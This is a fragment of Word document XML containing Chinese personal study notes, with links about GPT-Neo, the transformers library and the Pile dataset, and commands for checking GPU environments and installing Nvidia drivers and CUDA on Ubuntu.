      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>gpt</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> neo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC71CEA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>非官方，网友自己写的gpt</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>，已不再维护。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD089D" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D302D13" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/EleutherAI/gpt-neo/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E1B06" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/EleutherAI/gpt-neox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FAF64" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A184CB1" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tensorflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11431971" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://github.com/tensorflow/mesh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633B055" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18009422" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ransform</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F9B5D" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://huggingface.co/docs/transformers/index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483835C5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F73B17E" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046CE9F9" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>使用的训练资料:</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61589599" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://pile.eleuther.ai/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E700BDD" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B83EBBC" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF76BF5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F5559F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E27068" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FF0FBC" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0B83DA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CE12E5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B7A6B8" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1783BE48" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3427970A" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDA2E07" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6624A2C0" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487B8B0F" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE5FB63" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03EB7DE6" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRPr="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C05DDFD" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24115012" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3AF9C0" w14:textId="77777777" w:rsidR="00AB5393" w:rsidRDefault="00AB5393" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EED15A" w14:textId="332D2241" w:rsidR="004C452C" w:rsidRDefault="00080FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="787" w:name="_Toc159780208"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站唐老师学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
    </w:p>
    <w:p w14:paraId="6EAA3865" w14:textId="176A15CE" w:rsidR="00080FAB" w:rsidRDefault="00D85BB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E8AA9" w14:textId="6E9947BA" w:rsidR="00080FAB" w:rsidRDefault="00D85BB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D85BB4">
        <w:t>https://www.bilibili.com/video/BV1PN4y1V7d9/?spm_id_from=333.1007.top_right_bar_window_history.content.click&amp;vd_source=2f908ac18207c5aa72aa605dee4b20a3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961A7DB" w14:textId="77777777" w:rsidR="00974F1E" w:rsidRPr="00974F1E" w:rsidRDefault="00974F1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716D520C" w14:textId="5BDD61BE" w:rsidR="00080FAB" w:rsidRDefault="00080FAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AEE3A6" w14:textId="01570568" w:rsidR="00A31C83" w:rsidRDefault="00E7320D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="788" w:name="_Toc159780209"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥在大显卡机器安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、环境等的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="788"/>
    </w:p>
    <w:p w14:paraId="567F833B" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B24870" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="789" w:name="_Toc159780210"/>
      <w:r>
        <w:t>环境安装测试代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="789"/>
    </w:p>
    <w:p w14:paraId="4291BA31" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Pytorch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0CAE8" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>python -c "import torch ; print(torch.cuda.is_available());"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12950FB5" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B885C1B" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Cuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39427158" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>nvcc -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503086C" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2066EDB4" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Nvidia driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9DD65" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F3EB7" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tensorflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5AFD8" w14:textId="77777777" w:rsidR="000D209C" w:rsidRDefault="000D209C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        python -c "import tensorflow as tf; print(tf.test.gpu_device_name()) ;print(tf.test.is_gpu_available())"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F82AA2E" w14:textId="77777777" w:rsidR="00E7320D" w:rsidRPr="000D209C" w:rsidRDefault="00E7320D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5576EE20" w14:textId="77777777" w:rsidR="00E7320D" w:rsidRDefault="00E7320D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756F72F6" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A291B45" w14:textId="3912222A" w:rsidR="00A31C83" w:rsidRPr="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="790" w:name="_Toc159780211"/>
      <w:r w:rsidRPr="00022A6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu install nvidia driver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="790"/>
    </w:p>
    <w:p w14:paraId="70087BE9" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>驱动安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10868B77" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>可以直接到</w:t>
      </w:r>
      <w:r>
        <w:t>nvidia</w:t>
      </w:r>
      <w:r>
        <w:t>下载最新版驱动，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:t>源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1046A" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install -y  nvidia-driver-530 nvidia-settings nvidia-utils-530</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE507CC" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>访问：</w:t>
      </w:r>
      <w:hyperlink r:id="rId265" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://developer.nvidia.com/cuda-downloads?target_os=Linux&amp;target_arch=x86_64&amp;Distribution=Ubuntu&amp;target_version=22.04&amp;target_type=runfile_local</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DEE8E48" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50690137" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>wget &lt;https://developer.download.nvidia.com/compute/cuda/repos/ubuntu2204/x86_64/cuda-keyring_1.0-1_all.deb&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760769E" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo dpkg -i cuda-keyring_1.0-1_all.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB36ADB" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get update</w:t>
      </w:r>
    </w:p>
